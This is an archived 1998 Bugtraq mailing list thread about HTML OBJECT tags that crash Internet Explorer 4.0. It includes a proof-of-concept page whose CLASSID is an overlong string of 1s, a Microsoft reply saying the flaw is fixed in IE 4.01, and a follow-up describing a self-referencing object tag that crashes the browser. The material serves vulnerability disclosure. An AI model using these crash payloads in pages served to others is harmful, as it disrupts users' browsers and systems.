Bugtraq mailing list archives

Re: Object tag crashes Internet Explorer 4.0

From: adamm () GORGE NET (Adam Monaghan)
Date: Thu, 30 Jul 1998 09:33:51 -0700


I hate to question your credibility, but you're wrong, im on win98 with the
latest version of IE and the object tag will crash my browser and trash my
systray just like on any other machine, of course the one we used wasn't the
one at the bottom, you have an html file called the data object <object
data="crashmehtml.html"></object> in other words, put that tag in an html
file called crashmehtml.html. We got a kick out of it in the office


am



-----Original Message-----
From: Jason Garms <jasong () MICROSOFT COM>
To: BUGTRAQ () NETSPACE ORG <BUGTRAQ () NETSPACE ORG>
Date: Thursday, July 30, 1998 9:33 AM
Subject: Re: Object tag crashes Internet Explorer 4.0

Georgi,

The bug that caused the browser to crash in this way was fixed in IE 4.01
(which BTW is what's in Win98). People using 4.01 or 4.01 with SP1 cannot

be

crashed in this way.

Thanks,
-JasonG

Jason Garms, JasonG () Microsoft Com
Product Manager
Windows NT Security
Microsoft Corporation

-----Original Message-----
From: Georgi Guninski [mailto:guninski () HOTMAIL COM]
Sent: Tuesday, July 28, 1998 10:11 AM
To: BUGTRAQ () NETSPACE ORG
Subject: Object tag crashes Internet Explorer 4.0


The <OBJECT> tag seems to crash Internet Explorer 4.0 under Win95 (don't
know about other versions/OS).
The following:
<OBJECT CLASSID=____More than 250 characters here____></OBJECT>
opens a dialog box "IEXPLORE: ...illegal operation" and closes IE 4.0,
or a blue screen with "Fatal exception 0E" and you need to reboot.
I don't think this is exploitable(?), but it is a bad "feature".

Georgi Guninski
guninski () hotmail com
http://www.geocities.com/ResearchTriangle/1711

-------------------------------------Cut here: Object.html -------
<HTML>
Trying to crash IE 4.0
<OBJECT
CLASSID=1111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111>
</OBJECT>
</HTML>

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com

Current thread:

Re: Object tag crashes Internet Explorer 4.0 Brian Behlendorf (Jul 29)
- Re: Object tag crashes Internet Explorer 4.0 Brett Glass (Jul 30)
- <Possible follow-ups>
- Re: Object tag crashes Internet Explorer 4.0 Jason Garms (Jul 29)
- Re: Object tag crashes Internet Explorer 4.0 Adam Monaghan (Jul 30)